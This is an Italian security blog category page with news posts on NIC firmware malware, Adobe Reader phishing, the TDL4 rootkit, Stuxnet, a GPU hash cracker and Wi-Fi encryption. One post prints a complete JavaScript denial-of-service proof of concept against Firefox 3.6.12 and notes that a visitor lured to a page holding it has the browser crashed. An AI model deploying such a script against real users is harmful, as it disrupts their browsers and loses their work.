SIAMO GEEK

Categoria: Sicurezza

Sicurezza informatica

  • Virus nel firmware della NIC

    Sembra la vecchia storia del virus nella memoria CMOS del PC, però questa volta è vera: si può mettere del malware nel firmware di una scheda di rete.

    Guillaume Delugré, ha dimostrato con i fatti di essere riuscito a creare una versione modificata del firmware di una scheda di rete Broadcom NetExtreme.

    Il punto di partenza è stata la documentazione della scheda disponibile online, quindi Guillaume ha creato dei tool per il debug del firmware partendo da software open con cui ha colmato le lacune della documentazione disponibile.

    A questo punto possedeva la conoscenza necessaria per poter creare un firmware modificato ad arte e per poterlo scrivere al posto di quello legittimo.

    (altro…)

  • Mail e siti civetta per il nuovo Acrobat Reader

    Dopo l’uscita del nuovo Acrobat Reader X si stanno moltiplicando le mail di phishing e i siti civetta che invitano a scaricare un presunto nuovo Acrobat Reader.

    L’unico metodo sicuro per ottenere il nuovo Reader di Adobe, posto che non vogliate utilizzare delle alternative, è di andare su http://www.adobe.it e seguire le istruzioni in italiano per scaricare il programma.

    Le mail hanno oggetti come questi o molto simili:
    Download Your New Adobe PDF Reader For Windows And Mac
    Upgrade New Adobe Acrobat 2010 PDF Reader Alternative, {URL}
    Adobe Upgrade Notification, {URL}
    Action Required : Download Your New Adobe Acrobat Reader, {URL}
    New Adobe Acrobat PDF Reader Alternative, {URL}
    Action Required : Active Your New Adobe PDF Reader, {URL}
    Action Required : Upgrade Your New Adobe PDF Reader, {URL}
    Download Your New Adobe PDF Reader For Windows And Mac, {URL}

    Dove al posto di {URL} c’è un URL civetta tra quelli indicati sotto.

    Le mail invitano ad andare in un sito che è solo apparentemente connesso ad Acrobat Reader; tra i siti civetta ci sono:
    I SysAdmin potrebbero includere questi siti nella black list dei firewall e dei filtri di navigazione, anche se probabilmente è un’azione ridondante se si utilizzano gli aggiornamenti online delle black list. Molti di questi nomi a dominio sono registrati in Russia.

    Attenzione, quindi, a non scaricare software diverso da quello Adobe o di origine sicura.

    Un software per creare i PDF completamente e veramente gratuito, senza scherzi o watermarking è PDF Creator. Anche di questo prodotto esistono molte versioni simili a pagamento o con blocchi di qualche tipo. Diffidate di queste versioni alternative, specialmente se richiedono che il documento passi da un fantomatico “convertitore online”. (via SANS)

  • Cryptohaze Multiforcer

    Cryptohaze Multiforcer è un software che sfrutta le schede grafiche per un’analisi a forza bruta delle tabelle di hash.

    Il programma prende in input un file di testo con degli hash (MD4, MD5, NTLM, SHA1) e un file di testo con i set di caratteri da utilizzare in ciascuna posizione della password (la prima riga per il primo carattere, la seconda riga per il secondo carattere e così via).

    Cryptohaze Multiforcer è disponibile per Linux, Windows e MacOS e sfrutta i processori delle schede grafiche nVidia con il supporto CUDA.

    La velocità di elaborazione è molto elevata e richiedere poco tempo per trovare le password dato il loro hash, posto di possedere l’hardware adatto. (via Darknet)

  • Usabilità contro sicurezza

    In un’organizzazione tipica la proprietà (o chi per lei) si affida all’IT (dipendente, consulente o mix) per la gestione dei dati e della loro sicurezza (intesa sia come integrità sia come protezione).

    L’IT sa benissimo che usabilità e sicurezza sono due vettori uguali e contrari; compito del bravo IT è di mediare le due cose con le necessità aziendali e, spesso, con i capricci di alcuni utenti.

    Fino a poco tempo fa la soluzione della sicurezza informatica era quasi banale perché bastava stabilire un perimetro con accessi controllati: i computer all’interno erano sicuri, quelli all’esterno insicuri e alle porte si mettevano dei guardiani feroci (firewall, proxy e assimilati). (altro…)

  • Aggiornamento per Acrobat e Adobe Reader

    Da ieri sera (ora europea) Adobe ha rilasciato gli aggiornamenti per Acrobat e Adobe Reader per Windows, UNIX e OSX.

    L’ultima versione di Adobe Reader è, quindi, la 9.4.1 ed è l’unica a non essere interessata dai problemi scoperti a fine ottobre.

  • Rootkit che bypassa la protezione della firma digitale dei driver Windows

    TDL4 è la nuova versione di una famiglia di rootkit già noti che abbassa le difese di Windows a 64 bit contro il caricamento nel kernel di driver non firmati.

    La prima parte del malware si annida nel MBR e modifica in memoria il parametro del kernel LoadIntegrityCheckPolicy e fa in modo che vengano accettati anche i driver non firmati in maniera digitale.

    Questo permette al kernel di caricare una versione modificata di kdcom.dll, un componente del debugger del kernel. Le funzioni modificate dal malware esportate dalla DLL bloccano di fatto molti tentativi di debugging del rootkit.

    Se la parte del rootkit caricata nel MBR non entrasse in azione, la DLL sostituita provocherebbe un errore tipo *** Windows is unable to verify the signature of the file \Windows\system32\kdcom.dll. Ma l’abbassamento del livello di sicurezza forza il kernel a non effettuare alcuna verifica.

    A questo punto la porta è aperta per il caricamento di qualsiasi altra schifezza nel kernel. (via Threat Post)

  • Stuxnet era davvero fatto per le centrali iraniane

    Un nuovo sviluppo nella analisi del worm Stuxnet sembra confermare che in effetti era stato realmente progettato per attaccare le centrali nucleari iraniane.

    L’analisi portata avanti da Symantec spiega come il worm cerchi un PLC che sia collegato a specifici modelli di controlli per motori (due marche soltanto, una delle quali e` iraniana). Se li trova, verifica che stiano operando entro un certo range di frequenza (e quindi di velocita` dei motori), e solo se queste condizioni sono verificate, allora inizia a provocare brevi ma significative variazioni della velocita` dei motori, introducendo malfunzionamenti sporadici e non ripetibili, i quali sono ovviamente difficilissimi da scoprire e diagnosticare. Leggetevi l’originale, ve lo consiglio.

  • 0day di Mozilla Firefox 3.6.12

    <!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>

    Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

    Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

    Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

    Il problema è stato scoperto dal gruppo italiano Backtrack.

  • Proteggere i WiFi liberi con una password nota

    Il rilascio di Firesheep ha evidenziato un problema noto delle connessioni WiFi senza password: i dati non vengono trasmessi in modo criptato.

    Chester Wisniewski, senior security advisor di Sophos, propone una soluzione elementare, che consiste nell’utilizzare il protocollo WPA2 con una password nota e unica per tutti: free.

    Un piccolo aggiornamento nel software dei client WiFi potrebbe fare in modo che il client provi quella password prima ancora di chiederla all’utente.

    In questo caso la password non serve ad impedire la connessione a chi non ha titolo per farlo, ma forza il protocollo a negoziare una chiave di cifratura univoca con ciascun terminale collegato, rendendo di fatto inutile un tool come Firesheep.

    Aggiornamento 17/2/2011 – Un aggiornamento della pagina di Naked Security linkata sopra rivela che questa soluzione non è percorribile e non deve essere utilizzata. Grazie a Paolo Attivissimo per avermi segnalato l’aggiornamento.

  • Nessuno è immune

    Il sito della Marina Militare britannica è stato hackerato, a fianco la riproduzione dell’immagine che ha sostituito il sito.

    In questo momento il sito con la sola immagine sta girando su in Internet Information Server 6.0.

    L’autore dell’azione sembra essere TinKode, non nuovo a questo tipo di attacchi verso siti con alta visibilità.

    L’attacco sembra aver avuto l’unico scopo di rivelare un problema. TinKode, infatti, si è limitato a rivelare le credenziali di amministratore del sito, senza impiantare del codice dannoso come è successo, per esempio, con il sito del premio Nobel per la pace. (altro…)

  • Crimini odiosi

    L’FBI segnala un comportamento criminale di una persona che avrebbe utilizzato metodi di social engineering e un trojan per assumere il controllo della parte multimediale delle sue vittime, tutte ragazze minorenni.

    Il malvivente avrebbe contattato le vittime attraverso i social media e avrebbe spedito loro dei finti filmati, che erano in realtà dei software che gli avrebbero permesso di accedere ai dischi e all’input in tempo reale di microfono e webcam. Le vittime venivano in seguito ricattate minacciando di rivelare a terzi le fotografie contenute nei dischi o i dialoghi intercettati con microfono e webcam.

    La persona è stata arresta lo scorso giugno dopo due anni di indagini.

    (altro…)

  • Il problema dei biscotti

    Tempo fa illustravo ad alcuni amici, poco informatici, quanto molti dei protocolli utilizzati dalla rete siano assolutamente poco efficienti perchè disegnati quando, forse, era impossibile immaginare quanto la rete stessa potesse crescere e, soprattutto le direzioni che avrebbe preso.

    Ma tra gli esempi che avevo portato, mi ero dimenticato di includere i cookies. Questo splendido post di Michael Zalewski (ricercatore di Google nell’ambito della sicurezza) illustra quanto questo protocollo sia stato disegnato veramente male.

    Vi consiglio, però, di dimenticarvelo presto… soprattutto se state per fare un acquisto in rete, visto che l’eCommerce si basa proprio sull’utilizzo di questo meccanismo…

    (ps: la foto viene dal sito “www.ilpolliceinfarinato.it” e sono i biscotti che Nicole e le sue amichette hanno fatto durante la sua festa… se non avete problemi di dieta, andate a vedere anche la torta…)